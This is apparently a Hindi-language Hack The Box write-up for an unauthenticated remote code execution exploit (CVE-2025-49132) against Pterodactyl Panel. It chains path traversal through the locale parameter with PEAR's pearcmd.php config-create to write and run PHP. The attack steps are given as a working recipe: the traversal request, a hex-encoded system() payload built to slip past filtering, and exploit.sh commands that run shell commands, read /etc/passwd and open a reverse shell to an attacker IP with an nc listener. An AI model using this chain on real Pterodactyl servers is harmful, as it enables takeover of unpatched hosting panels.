
Pterodactyl Panel के लिए बिना प्रमाणीकरण के RCE शोषण (CVE-2025-49132) जो पथ ट्रैवर्सल को PEAR कमांड इंजेक्शन के साथ जोड़कर कमजोर सर्वरों पर मनमाना PHP कोड निष्पादित करता है।
HTB सीज़न 10 - Pterodactyl मशीन लेखन
लक्ष्य: Pterodactyl HTB मशीन (मध्यम कठिनाई)
CVE: CVE-2025-49132
गंभीरता: गंभीर (CVSS 9.8)
हमले का प्रकार: अप्रमाणित दूरस्थ कोड निष्पादन
प्रभावित: Pterodactyl Panel < v1.11.11
यह शोषण श्रृंखला संयोजित करती है:
Pterodactyl Panel का /locales/locale.json एंडपॉइंट locale पैरामीटर के माध्यम से पथ ट्रैवर्सल की अनुमति देता है:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
इसे PEAR के pearcmd.php के साथ जोड़ा जा सकता है:
/tmp में मनमानी PHP फ़ाइलें लिखेंPEAR (PHP एक्सटेंशन और एप्लिकेशन रिपॉजिटरी) में एक CLI उपकरण (pearcmd.php) है जो:
config-create कमांड है जो फ़ाइलें लिखता हैशोषण श्रृंखला:
पथ ट्रैवर्सल → pearcmd.php लोड करें → config-create के माध्यम से PHP इंजेक्ट करें → दुर्भावनापूर्ण PHP निष्पादित करें
कमांड को hex2bin() का उपयोग करके हेक्स-एन्कोड किया जाता है ताकि बाइपास किया जा सके:
उदाहरण:
Command: whoami
Hex: 77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>
विधि: प्रदान की गई exploit.sh का उपयोग करके
chmod +x exploit.sh
# Get user flag
./exploit.sh flag
# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# Reverse shell
nc -lvnp 4444 # On attacker machine
./exploit.sh shell 10.10.14.21 4444